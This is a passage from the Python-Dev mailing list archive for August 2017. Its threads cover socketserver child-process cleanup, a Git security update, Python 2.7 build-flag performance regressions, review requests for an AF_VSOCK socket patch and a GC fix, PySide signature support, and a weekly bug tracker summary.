visibly exposes in the GitHub UI the review state of a PR. I'm not backfilling the open PRs as it's more work and I don't want to do said work. ;) But as PRs are opened, reviewed, etc., things should slowly trickle their way through the various PRs. I should mention this is the second-to-last "intrusive" workflow change I have planned to introduce some new aspect to the workflow (the last one being a status check for a news entry after every branch has been blurbified). After these two changes land, everything else I have planned is just touching things up (e.g. the CLA check becoming a status check instead of a label, touching up CONTRIBUTING.md, etc.). I think some other people have plans to improve things as well, but at least my TODO list of "radical" changes to our workflow is almost done! -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmsr at lab.net Fri Aug 11 18:34:51 2017 From: rmsr at lab.net (Ryan Smith-Roberts) Date: Fri, 11 Aug 2017 22:34:51 +0000 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: I agree that blocking shutdown by default isn't a good idea. A child will eventually get indefinitely stuck on a nonresponsive connection and hang the whole server. This behavior change is surprising and should be reverted in master, and definitely not backported. As for block-timeout or block-timeout-kill, waiting more than zero seconds in server_close() should be optional, because you're right that the best timeout is circumstantial. Since ThreadingMixIn also leaks threads, server_close() could grow a timeout flag (following the socket module timeout convention) and maybe a terminate boolean. ThreadingMixIn could then also be fixed. I'm not sure how useful that is though, since I'd bet almost all users of socketserver exit the process shortly after server_close(). Plus it can't be backported to the feature-freeze branches. It seems like this is getting complicated enough that putting the fix in test_socketserver.py is probably best. Another solution is to add a secret terminating-close flag to ForkingMixIn just for the tests. Is that good practice in the stdlib? On Fri, Aug 11, 2017 at 6:46 AM Victor Stinner wrote: > Hi, > > I'm working on reducing the failure rate of Python CIs (Travis CI, > AppVeyor, buildbots). For that, I'm trying to reduce test side effects > using "environment altered" warnings. This week, I worked on > support.reap_children() which detects leaked child processes (usually > created with os.fork()). > > I found a bug in the socketserver module: it waits for child processes > completion, but only in non-blocking mode. If a child process takes > too long, the server will never reads its exit status and so the > server leaks "zombie processes". Leaking processes can increase the > memory usage, spawning new processes can fail, etc. > > => http://bugs.python.org/issue31151 > > I changed the code to call waitpid() in blocking mode on each child > process on server_close(), to ensure that all children completed when > on server close: > > > https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 > > After pushing my change, I'm not sure anymore if it's a good idea. > There is a risk that server_close() blocks if a child is stuck on a > socket recv() or send() for some reasons. > > Should we relax the code by waiting a few seconds (problem: hardcoded > timeouts are always a bad idea), or *terminate* processes (SIGKILL on > UNIX) if they don't complete fast enough? > > I don't know which applications use socketserver. How I can test if it > breaks code in the wild? > > At least, I didn't notice any regression on Python CIs. > > Well, maybe the change is ok for the master branch. But I would like > your opinion because now I would like to backport the fix to 2.7 and > 3.6 branches. It might break some applications. > > If we *cannot* backport such change to 2.7 and 3.6 because it changes > the behaviour, I will fix the bug in test_socketserver.py instead. > > What do you think? > > Victor > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/rmsr%40lab.net > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vadmium+py at gmail.com Sat Aug 12 09:07:30 2017 From: vadmium+py at gmail.com (Martin Panter) Date: Sat, 12 Aug 2017 13:07:30 +0000 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: > On Fri, Aug 11, 2017 at 6:46 AM Victor Stinner > wrote: >> => http://bugs.python.org/issue31151 >> >> I changed the code to call waitpid() in blocking mode on each child >> process on server_close(), to ensure that all children completed when >> on server close: >> >> https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 >> >> After pushing my change, I'm not sure anymore if it's a good idea. >> There is a risk that server_close() blocks if a child is stuck on a >> socket recv() or send() for some reasons. I agree that this could be an unwanted change in behaviour. For example, a web browser could be holding a HTTP 1.1 persistent connection open. >> Should we relax the code by waiting a few seconds (problem: hardcoded >> timeouts are always a bad idea), or *terminate* processes (SIGKILL on >> UNIX) if they don't complete fast enough? It does seem reasonable to have an option to clean up background forks, whether by blocking, or terminating them immediately. On 11 August 2017 at 22:34, Ryan Smith-Roberts wrote: > Since ThreadingMixIn also leaks threads, > server_close() could grow a timeout flag (following the socket module > timeout convention) and maybe a terminate boolean. ThreadingMixIn could then > also be fixed. You could do a blocking join on each background thread. But I suspect there is no perfect way to terminate the threads without waiting. Using ThreadingMixIn.daemon_threads and exiting the interpreter might have to be good enough. From chekat2 at gmail.com Sun Aug 13 19:11:03 2017 From: chekat2 at gmail.com (Cheryl Sabella) Date: Sun, 13 Aug 2017 19:11:03 -0400 Subject: [Python-Dev] Git and Mercurial Security Update Message-ID: http://www.esecurityplanet.com/threats/git-svn-and-mercurial-open-source-version-control-systems-update-for-critical-security-vulnerability.html -------------- next part -------------- An HTML attachment was scrubbed... URL: From rymg19 at gmail.com Sun Aug 13 22:05:48 2017 From: rymg19 at gmail.com (rymg19 at gmail.com) Date: Sun, 13 Aug 2017 19:05:48 -0700 Subject: [Python-Dev] Git and Mercurial Security Update In-Reply-To: <> Message-ID: Interesting, but does this really concern Python? I mean, it's hosted on GitHub and doesn't seem to recommend use of ssh URLs anyway... -- Ryan (????) Yoko Shimomura, ryo (supercell/EGOIST), Hiroyuki Sawano >> everyone elsehttp://refi64.com On Aug 13, 2017 at 8:11 PM, > wrote: http://www.esecurityplanet.com/threats/git-svn-and-mercurial-open-source-version-control-systems-update-for-critical-security-vulnerability.html _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/rymg19%40gmail.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From mariatta.wijaya at gmail.com Sun Aug 13 22:25:19 2017 From: mariatta.wijaya at gmail.com (Mariatta Wijaya) Date: Sun, 13 Aug 2017 19:25:19 -0700 Subject: [Python-Dev] Git and Mercurial Security Update In-Reply-To: References: Message-ID: Thanks for the info Cheryl. For those on Mac OS, you can update your local git using homebrew as follows: If you have installed git on MacOS using homebrew before: $ brew upgrade git If you did not install git using Homebrew, (for example if you've been using the built-in git) $ brew install git `git --version` tells you what version you have. It should be 2.14.1 now. On Windows, perhaps see https://confluence.atlassian.com/bitbucketserver/installing-and-upgrading-git-776640906.html#InstallingandupgradingGit-InstallorupgradeGitonWindows Mariatta Wijaya On Sun, Aug 13, 2017 at 7:05 PM, rymg19 at gmail.com wrote: > Interesting, but does this really concern Python? I mean, it's hosted on > GitHub and doesn't seem to recommend use of ssh URLs anyway... > > > -- > Ryan (????) > Yoko Shimomura, ryo (supercell/EGOIST), Hiroyuki Sawano >> everyone elsehttp://refi64.com > > On Aug 13, 2017 at 8:11 PM, > wrote: > > http://www.esecurityplanet.com/threats/git-svn-and- > mercurial-open-source-version-control-systems-update-for- > critical-security-vulnerability.html > _______________________________________________ Python-Dev mailing list > Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > rymg19%40gmail.com > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > mariatta.wijaya%40gmail.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From victor.stinner at gmail.com Mon Aug 14 04:07:23 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Mon, 14 Aug 2017 10:07:23 +0200 Subject: [Python-Dev] Git and Mercurial Security Update In-Reply-To: References: Message-ID: By the way, I suggest you to enable 2-factor authentication in GitHub. You can use FreeOTP on your smartphone, or buy a yubikey nano, for example. Victor Le 14 ao?t 2017 03:11, "Cheryl Sabella" a ?crit : > http://www.esecurityplanet.com/threats/git-svn-and- > mercurial-open-source-version-control-systems-update-for- > critical-security-vulnerability.html > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > victor.stinner%40gmail.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From victor.stinner at gmail.com Wed Aug 16 10:13:09 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 16 Aug 2017 16:13:09 +0200 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: Hi, The first bug was that test_socketserver "leaked" child processes: it means that socketserver API creates zombie processes depending how long the child processes take to complete. If you want to backport my change waiting until child processes complete, you need to fix the bug differently, so test_socketserver doesn't leak processes (ex: wait until child processes complete in test_socketserver). 2017-08-12 0:34 GMT+02:00 Ryan Smith-Roberts : > I agree that blocking shutdown by default isn't a good idea. A child will > eventually get indefinitely stuck on a nonresponsive connection and hang the > whole server. This behavior change is surprising and should be reverted in > master, and definitely not backported. Right, a child process can hang. The question is how to handle such case. I see 3 choices: * Do nothing: Python 3.6 behaviour * Blocking wait until the child process completes * Wait a few seconds and then kill the process after a dead line In Python 3.6, the process is stuck and continue to run even after shutdown() and server_close(). That's surprising and doesn't seem right to me. > As for block-timeout or block-timeout-kill, waiting more than zero seconds > in server_close() should be optional, because you're right that the best > timeout is circumstantial. Maybe we need to add a new method to wait N seconds until children completes, then send SIGTERM, and finally send SIGKILL if children take longer than N seconds to complete. So the developer becomes responsible of killing child processes. In the Apache world, it's called the "graceful" stop: https://httpd.apache.org/docs/2.4/stopping.html > Since ThreadingMixIn also leaks threads, > server_close() could grow a timeout flag (following the socket module > timeout convention) and maybe a terminate boolean. Oh, I didn't know that ThreadingMixIn also leaks threads. That's a similar but different issue. It's not easily possible to "kill" a thread. > Plus it can't be backported to the feature-freeze branches. IMHO leaking zombie processes is a bug, but I'm ok to keep bugs and only fix tests. Victor From elprans at gmail.com Wed Aug 16 18:31:32 2017 From: elprans at gmail.com (Elvis Pranskevichus) Date: Wed, 16 Aug 2017 18:31:32 -0400 Subject: [Python-Dev] Help requested with Python 2.7 performance regression In-Reply-To: References: <20170301122824.3f1f3689@subdivisions.wooz.org> Message-ID: After much testing I found what is causing the regression in 16.04 and later. There are several distinct causes which are attributed to the choices made in debian/rules and the changes in GCC. Cause #1: the decision to compile `Modules/_math.c` with `-fPIC` *and* link it statically into the python executable [1]. This causes the majority of the slowdown. This may be a bug in GCC or simply a constraint, I didn't find anything specific on this topic, although there are a lot of old bug reports regarding the interaction of -fPIC with -flto. Cause #2: the enablement of `fpectl` [2], specifically the passage of `--with-fpectl` to `configure`. fpectl is disabled in python.org builds by default and its use is discouraged. Yet, Debian builds enable it unconditionally, and it seems to cause a significant performance degradation. It's much less noticeable on 14.04 with GCC 4.8.0, but on more recent releases the performance difference seems to be larger. Plausible Cause #3: stronger stack smashing protection in 16.04, which uses --fstack-protector-strong, whereas 14.04 and earlier used --fstack-protector (with lesser performance overhead). Also, debian/rules limits the scope of PGO's PROFILE_TASK to 377 test suites vs upstream's 397, which affects performance somewhat negatively, but this is not definitive. What are the reasons behind the trimming of the tests used for PGO? Without fpectl, and without -fPIC on _math.c, 2.7.12 built on 16.04 is slower than stock 2.7.6 on 14.04 by about 0.9% in my pyperformance runs [3]. This is in contrast to a whopping 7.95% slowdown when comparing stock versions. Finally, a vanilla Python 2.7.12 build using GCC 5.4.0, default CFLAGS, default PROFILE_TASK and default Modules/Setup.local consistently runs faster in benchmarks than 2.7.6 (by about 0.7%), but I was not able to pinpoint the exact reason for this difference. Note: the percentages above are the relative change in the geometric mean of pyperformance benchmark results. [1] https://git.launchpad.net/~usd-import-team/ubuntu/+source/python2.7/tree/debian/rules?h=ubuntu/xenial-updates#n421 [2] https://git.launchpad.net/~usd-import-team/ubuntu/+source/python2.7/tree/debian/rules?h=ubuntu/xenial-updates#n117 [3] https://docs.google.com/spreadsheets/d/1L3_gxe-AOYJsXFwGZgFko8jaChB0dFPjK5oMO5T5vj4/edit?usp=sharing Elvis On Fri, Mar 3, 2017 at 10:27 AM, Louis Bouchard < louis.bouchard at canonical.com> wrote: > Hello, > > Le 03/03/2017 ? 15:37, Louis Bouchard a ?crit : > > Hello, > > > > Le 03/03/2017 ? 15:31, Victor Stinner a ?crit : > >>> Out of curiosity, I ran the set of benchmarks in two LXC containers > running > >>> centos7 (2.7.5 + gcc 4.8.5) and Fedora 25 (2.7.13 + gcc 6.3.x). The > benchmarks > >>> do run faster in 18 benchmarks, slower on 12 and insignificant for the > rest (~33 > >>> from memory). > >> > >> "faster" or "slower" is relative: I would like to see the ?.??x > >> faster/slower or percent value. Can you please share the result? I > >> don't know what is the best output: > >> python3 -m performance compare centos.json fedora.json > >> or the new: > >> python3 -m perf compare_to centos.json fedora.json --table --quiet > >> > >> Victor > >> > > > > All the results, including the latest are in the spreadsheet here (cited > in the > > analysis document) : > > > > https://docs.google.com/spreadsheets/d/1pKCOpyu4HUyw9YtJugn6jzVGa_ > zeDmBVNzqmXHtM6gM/edit#gid=1548436297 > > > > Third column is the ?.??x value that you are looking for, taken directly > out of > > the 'pyperformance analyze' results. > > > > I didn't know about the new options, I'll give it a spin & see if I can > get a > > better format. > > All the benchmark data using the new format have been uploaded to the > spreadsheet. Each sheet is prefixed with pct_. > > HTH, > > Kind regards, > > ...Louis > > > -- > Louis Bouchard > Software engineer, Cloud & Sustaining eng. > Canonical Ltd > Ubuntu developer Debian Maintainer > GPG : 429D 7A3B DD05 B6F8 AF63 B9C4 8B3D 867C 823E 7A61 > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > elprans%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From cavery at redhat.com Thu Aug 17 08:21:35 2017 From: cavery at redhat.com (Cathy Avery) Date: Thu, 17 Aug 2017 08:21:35 -0400 Subject: [Python-Dev] python issue27584 AF_VSOCK support Message-ID: <59958A4F.30207@redhat.com> Hi, I have a python pull request https://github.com/python/cpython/pull/2489 that introduces AF_VSOCK to the python C socket module. Unfortunately things have gone quiet for several weeks. Since I am new to this process I am unclear on what to expect as the next steps. I believe I have addressed all issues. If I am mistaken please let me know. A real functioning test setup is a bit painful and I would be happy to help in anyway I can. The Microsoft Hyper V team is now introducing support of vsock in the upstream linux kernel so its adoption is spreading amongst the various hypervisors. Any guidance on the basic timelines would be very helpful. Thanks, Cathy From brett at python.org Thu Aug 17 14:36:41 2017 From: brett at python.org (Brett Cannon) Date: Thu, 17 Aug 2017 18:36:41 +0000 Subject: [Python-Dev] python issue27584 AF_VSOCK support In-Reply-To: <59958A4F.30207@redhat.com> References: <59958A4F.30207@redhat.com> Message-ID: Since everyone is a volunteer, Cathy, there are unfortunately no real timelines. It really comes down to someone who feels they have the knowledge necessary to review the PR having the spare time to do so. So emailing here and saying, "my PR has addressed all the comments and has been ready to go for 29 days; anything else I can do?" is the right thing to up the PR's exposure. On Thu, 17 Aug 2017 at 08:02 Cathy Avery wrote: > Hi, > > I have a python pull request https://github.com/python/cpython/pull/2489 > that introduces AF_VSOCK to the python C socket module. Unfortunately > things have gone quiet for several weeks. Since I am new to this process > I am unclear on what to expect as the next steps. I believe I have > addressed all issues. If I am mistaken please let me know. A real > functioning test setup is a bit painful and I would be happy to help in > anyway I can. The Microsoft Hyper V team is now introducing support of > vsock in the upstream linux kernel so its adoption is spreading amongst > the various hypervisors. > > Any guidance on the basic timelines would be very helpful. > > Thanks, > > Cathy > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/brett%40python.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From christian at python.org Thu Aug 17 17:38:00 2017 From: christian at python.org (Christian Heimes) Date: Thu, 17 Aug 2017 23:38:00 +0200 Subject: [Python-Dev] python issue27584 AF_VSOCK support In-Reply-To: <59958A4F.30207@redhat.com> References: <59958A4F.30207@redhat.com> Message-ID: On 2017-08-17 14:21, Cathy Avery wrote: > Hi, > > I have a python pull request https://github.com/python/cpython/pull/2489 > that introduces AF_VSOCK to the python C socket module. Unfortunately > things have gone quiet for several weeks. Since I am new to this process > I am unclear on what to expect as the next steps. I believe I have > addressed all issues. If I am mistaken please let me know. A real > functioning test setup is a bit painful and I would be happy to help in > anyway I can. The Microsoft Hyper V team is now introducing support of > vsock in the upstream linux kernel so its adoption is spreading amongst > the various hypervisors. > > Any guidance on the basic timelines would be very helpful. Hi Cathy, thanks for your contribution! Your patch looks mostly fine. I pointed out some minor issues in my review. Regards, Christian From tismer at stackless.com Fri Aug 18 04:41:05 2017 From: tismer at stackless.com (Christian Tismer) Date: Fri, 18 Aug 2017 10:41:05 +0200 Subject: [Python-Dev] __signature__ for PySide ready Message-ID: Hi friends, in the last months, I have developed signature support for PySide. The module creates the same signatures as are known for plain Python functions. As a non-trivial addition, the module also handles multiple signatures as a list. I consider this extension to PySide as quite essential and actually more important as for Python itself, because type info is rather crucial for PySide. Initially, I wrote this as a pure Python 3 extension. Then I was "asked" to port this to Python 2 too, which was quite hairy to do. I'm not sure if I should have done that. Before I publish this module, I want to ask: -------------------------------------------- Is it a bad idea to support signatures in Python 2 as well? Do I introduce a feature that should not exist in Python 2? Or is it fine to do so? Please let me know your opinion, I am happy with any result. Cheers -- Chris -- Christian Tismer :^) tismer at stackless.com Software Consulting : http://www.stackless.com/ Karl-Liebknecht-Str. 121 : https://github.com/PySide 14482 Potsdam : GPG key -> 0xFB7BEE0E phone +49 173 24 18 776 fax +49 (30) 700143-0023 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: OpenPGP digital signature URL: From songofacandy at gmail.com Fri Aug 18 07:04:33 2017 From: songofacandy at gmail.com (INADA Naoki) Date: Fri, 18 Aug 2017 20:04:33 +0900 Subject: [Python-Dev] Could someone review GH-2974 which add missing PyObject_GC_UnTrack()? Message-ID: Hi. I created PR which fixes potential crash. Serhiy Storchaka approved it already, but he wants one other review from core dev. And I updated document after his review too. So I want more one reviewer for the PR. Someone help me? https://github.com/python/cpython/pull/2974 https://bugs.python.org/issue31095 ## Background For GC types, tp_dealloc should call PyObject_GC_UnTrack() before calling any APIs which can run arbitrary code, including Py_DECREF. Without calling it, GC may happen during tp_dealloc and GC will find object which refcnt == 0. I checked all GC types and find some unsafe tp_dealloc. Even "extending and embedding" document missed untracking. Regards, INADA Naoki From status at bugs.python.org Fri Aug 18 12:09:19 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 18 Aug 2017 18:09:19 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170818160919.4883F11A860@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-08-11 - 2017-08-18) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6133 (+17) closed 36852 (+32) total 42985 (+49) Open issues with patches: 2343 Issues opened (35) ================== #14976: queue.Queue() is not reentrant, so signals and GC can cause de http://bugs.python.org/issue14976 reopened by yselivanov #30747: _Py_atomic_* not actually atomic on Windows with MSVC http://bugs.python.org/issue30747 reopened by steve.dower #30983: eval frame rename in pep 0523 broke gdb's python extension http://bugs.python.org/issue30983 reopened by haypo #31170: expat: utf8_toUtf8 cannot properly handle exhausting buffer http://bugs.python.org/issue31170 reopened by tianlynn #31184: Fix data descriptor detection in inspect.getattr_static http://bugs.python.org/issue31184 opened by davidhalter #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 opened by serhiy.storchaka #31188: Makefile.pre.in: commoninstall: reformat http://bugs.python.org/issue31188 opened by dilyan.palauzov #31189: README.rst: installing multiple versions: typo http://bugs.python.org/issue31189 opened by dilyan.palauzov #31190: ./configure: add ability to build and install only shared libr http://bugs.python.org/issue31190 opened by dilyan.palauzov #31191: Fix grammar in threading.Barrier docs http://bugs.python.org/issue31191 opened by schedutron #31193: re.IGNORECASE strips combining character from lower case of LA http://bugs.python.org/issue31193 opened by David MacIver #31196: Blank line inconsistency between InteractiveConsole and standa http://bugs.python.org/issue31196 opened by Malcolm Smith #31197: Namespace disassembly omits some compiled objects http://bugs.python.org/issue31197 opened by ncoghlan #31199: configure checks fail confusingly under --with-address-sanitiz http://bugs.python.org/issue31199 opened by pmatos #31200: address sanitizer build fails http://bugs.python.org/issue31200 opened by pmatos #31201: module test that failed doesn't exist http://bugs.python.org/issue31201 opened by pmatos #31202: Windows pathlib.Path.glob(pattern) fixed part of the pattern c http://bugs.python.org/issue31202 opened by aicirbs #31203: socket.IP_PKTINFO is missing from python http://bugs.python.org/issue31203 opened by guerby #31206: IDLE, configdialog: Factor out HighPage class from ConfigDialo http://bugs.python.org/issue31206 opened by terry.reedy #31207: IDLE, configdialog: Factor out ExtPage class from ConfigDialog http://bugs.python.org/issue31207 opened by terry.reedy #31209: MappingProxyType can not be pickled http://bugs.python.org/issue31209 opened by Alex Hayes #31210: Can not import modules if sys.prefix contains DELIM http://bugs.python.org/issue31210 opened by ced #31211: distutils/util.py get_platform() does not identify linux-i686 http://bugs.python.org/issue31211 opened by siming85 #31212: datetime: min date (0001-01-01 00:00:00) can't be converted to http://bugs.python.org/issue31212 opened by Dave Johansen #31213: __context__ reset to None in nested exception http://bugs.python.org/issue31213 opened by Christopher Stelma #31215: Add version changed notes for OpenSSL 1.1.0 compatibility http://bugs.python.org/issue31215 opened by ncoghlan #31217: test_code leaked [1, 1, 1] memory blocks on x86 Gentoo Refleak http://bugs.python.org/issue31217 opened by haypo #31218: del expects __delitem__ if __setitem__ is defined http://bugs.python.org/issue31218 opened by raumzeitkeks #31222: datetime.py implementation of .replace inconsistent with C imp http://bugs.python.org/issue31222 opened by p-ganssle #31224: Missing definition of frozen module http://bugs.python.org/issue31224 opened by marco.buttu #31226: shutil.rmtree fails when target has an internal directory junc http://bugs.python.org/issue31226 opened by vidartf #31227: regrtest: reseed random with the same seed before running a te http://bugs.python.org/issue31227 opened by haypo #31229: wrong error messages when too many kwargs are received http://bugs.python.org/issue31229 opened by Oren Milman #31230: Define a general "asynchronous operation introspection" protoc http://bugs.python.org/issue31230 opened by ncoghlan #31232: Backport the new custom "print >> sys.stderr" error message? http://bugs.python.org/issue31232 opened by ncoghlan Most recent 15 issues with no replies (15) ========================================== #31224: Missing definition of frozen module http://bugs.python.org/issue31224 #31207: IDLE, configdialog: Factor out ExtPage class from ConfigDialog http://bugs.python.org/issue31207 #31202: Windows pathlib.Path.glob(pattern) fixed part of the pattern c http://bugs.python.org/issue31202 #31196: Blank line inconsistency between InteractiveConsole and standa http://bugs.python.org/issue31196 #31191: Fix grammar in threading.Barrier docs http://bugs.python.org/issue31191 #31190: ./configure: add ability to build and install only shared libr http://bugs.python.org/issue31190 #31189: README.rst: installing multiple versions: typo http://bugs.python.org/issue31189 #31188: Makefile.pre.in: commoninstall: reformat http://bugs.python.org/issue31188 #31182: Suggested Enhancements to zipfile & tarfile command line inter http://bugs.python.org/issue31182 #31181: Segfault in gcmodule.c:360 visit_decref (PyObject_IS_GC(op)) http://bugs.python.org/issue31181 #31180: test_multiprocessing_spawn hangs randomly on x86 Windows7 3.6 http://bugs.python.org/issue31180 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31177: unittest mock's reset_mock throws an error when an attribute h http://bugs.python.org/issue31177 #31176: Is a UDP transport also a ReadTransport/WriteTransport? http://bugs.python.org/issue31176 #31165: null pointer deref and segfault in list_slice (listobject.c:45 http://bugs.python.org/issue31165 Most recent 15 issues waiting for review (15) ============================================= #31229: wrong error messages when too many kwargs are received http://bugs.python.org/issue31229 #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 #31184: Fix data descriptor detection in inspect.getattr_static http://bugs.python.org/issue31184 #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 #31151: test_socketserver: Warning -- reap_children() reaped child pro http://bugs.python.org/issue31151 #31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am http://bugs.python.org/issue31120 #31113: Stack overflow with large program http://bugs.python.org/issue31113 #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 #31046: ensurepip does not honour the value of $(prefix) http://bugs.python.org/issue31046 #31021: Clarify programming faq. http://bugs.python.org/issue31021 #31020: Add support for custom compressor in tarfile http://bugs.python.org/issue31020 Top 10 most discussed issues (10) ================================= #30871: Add test.pythoninfo http://bugs.python.org/issue30871 15 msgs #31210: Can not import modules if sys.prefix contains DELIM http://bugs.python.org/issue31210 15 msgs #14976: queue.Queue() is not reentrant, so signals and GC can cause de http://bugs.python.org/issue14976 12 msgs #31212: datetime: min date (0001-01-01 00:00:00) can't be converted to http://bugs.python.org/issue31212 10 msgs #30983: eval frame rename in pep 0523 broke gdb's python extension http://bugs.python.org/issue30983 9 msgs #5001: Remove assertion-based checking in multiprocessing http://bugs.python.org/issue5001 6 msgs #30947: Update embeded copy of libexpat from 2.2.1 to 2.2.3 http://bugs.python.org/issue30947 6 msgs #31149: Add Japanese to the language switcher http://bugs.python.org/issue31149 6 msgs #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 6 msgs #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 5 msgs Issues closed (34) ================== #18966: Threads within multiprocessing Process terminate early http://bugs.python.org/issue18966 closed by pitrou #24700: array compare is hideously slow http://bugs.python.org/issue24700 closed by pitrou #29593: Improve UnboundLocalError message for deleted names http://bugs.python.org/issue29593 closed by mbussonn #30616: Cannot use functional API to create enum with zero values http://bugs.python.org/issue30616 closed by haypo #30714: test_ssl fails with openssl 1.1.0f: test_alpn_protocols() http://bugs.python.org/issue30714 closed by christian.heimes #30721: Show expected input for right shift operator usage in custom " http://bugs.python.org/issue30721 closed by ncoghlan #30846: [3.6] test_rapid_restart() of test_multiprocessing_fork fails http://bugs.python.org/issue30846 closed by haypo #30910: Add -fexception to ppc64le build http://bugs.python.org/issue30910 closed by benjamin.peterson #31001: IDLE: Add tests for configdialog highlight tab http://bugs.python.org/issue31001 closed by terry.reedy #31002: IDLE: Add tests for configdialog keys tab http://bugs.python.org/issue31002 closed by terry.reedy #31067: test_subprocess.test_leak_fast_process_del_killed() fails rand http://bugs.python.org/issue31067 closed by haypo #31069: test_multiprocessing_spawn and test_multiprocessing_forkserver http://bugs.python.org/issue31069 closed by haypo #31129: RawConfigParser.items() is unusual in taking arguments http://bugs.python.org/issue31129 closed by gvanrossum #31142: python shell crashed while input quotes in print() http://bugs.python.org/issue31142 closed by ned.deily #31147: a suboptimal check in list_extend() http://bugs.python.org/issue31147 closed by rhettinger #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 closed by pitrou #31186: Support heapfix() and heapremove() APIs in heapq module http://bugs.python.org/issue31186 closed by rhettinger #31187: suboptimal code in Py_ReprEnter() http://bugs.python.org/issue31187 closed by serhiy.storchaka #31192: "return await coro()" SyntaxError despite being "valid syntax" http://bugs.python.org/issue31192 closed by martin.panter #31194: Inconsistent __repr__s for _collections objects http://bugs.python.org/issue31194 closed by r.david.murray #31195: Make any() and all() work with async generators http://bugs.python.org/issue31195 closed by brett.cannon #31198: getaddrinfo: inconsistent handling of port=None http://bugs.python.org/issue31198 closed by njs #31204: Support __fspath__ in shlex.quote http://bugs.python.org/issue31204 closed by Anthony Sottile #31205: IDLE, configdialog: Factor out KeysPage class from ConfigDialo http://bugs.python.org/issue31205 closed by terry.reedy #31208: Simplify `low_fds_to_close` in subprocess.py http://bugs.python.org/issue31208 closed by qingyunha #31214: os.walk has a bug on Windows http://bugs.python.org/issue31214 closed by r.david.murray #31216: Add ensure_ascii argument to json.tool http://bugs.python.org/issue31216 closed by r.david.murray #31219: Spam http://bugs.python.org/issue31219 closed by matrixise #31220: Spam http://bugs.python.org/issue31220 closed by matrixise #31221: Tools/scripts/patchcheck.py must ignore changes in Modules/exp http://bugs.python.org/issue31221 closed by haypo #31223: Spam http://bugs.python.org/issue31223 closed by zach.ware #31225: allow hashlib `update' to accept str http://bugs.python.org/issue31225 closed by pitrou #31228: Subprocess.Popen crash w/ Win10, debug32, bad file, and PIPE http://bugs.python.org/issue31228 closed by eryksun #31231: Travis CI mac test broken: ./python: is a directory http://bugs.python.org/issue31231 closed by haypo From yselivanov.ml at gmail.com Fri Aug 18 12:20:20 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 18 Aug 2017 12:20:20 -0400 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: References: Message-ID: Hi Christian, On Fri, Aug 18, 2017 at 4:41 AM, Christian Tismer wrote: > Hi friends, > > in the last months, I have developed signature support for > PySide. The module creates the same signatures as are known > for plain Python functions. > > As a non-trivial addition, the module also handles multiple > signatures as a list. I consider this extension to PySide > as quite essential and actually more important as for Python > itself, because type info is rather crucial for PySide. > > Initially, I wrote this as a pure Python 3 extension. > Then I was "asked" to port this to Python 2 too, which was > quite hairy to do. I'm not sure if I should have done that. > > Before I publish this module, I want to ask: > -------------------------------------------- > > Is it a bad idea to support signatures in Python 2 as well? There's a backport of signature API to Python 2. Although last time I checked it was fairly outdated. > Do I introduce a feature that should not exist in Python 2? > Or is it fine to do so? > > Please let me know your opinion, I am happy with any result. From brett at python.org Fri Aug 18 12:31:22 2017 From: brett at python.org (Brett Cannon) Date: Fri, 18 Aug 2017 16:31:22 +0000 Subject: [Python-Dev] __signature__ for PySide ready 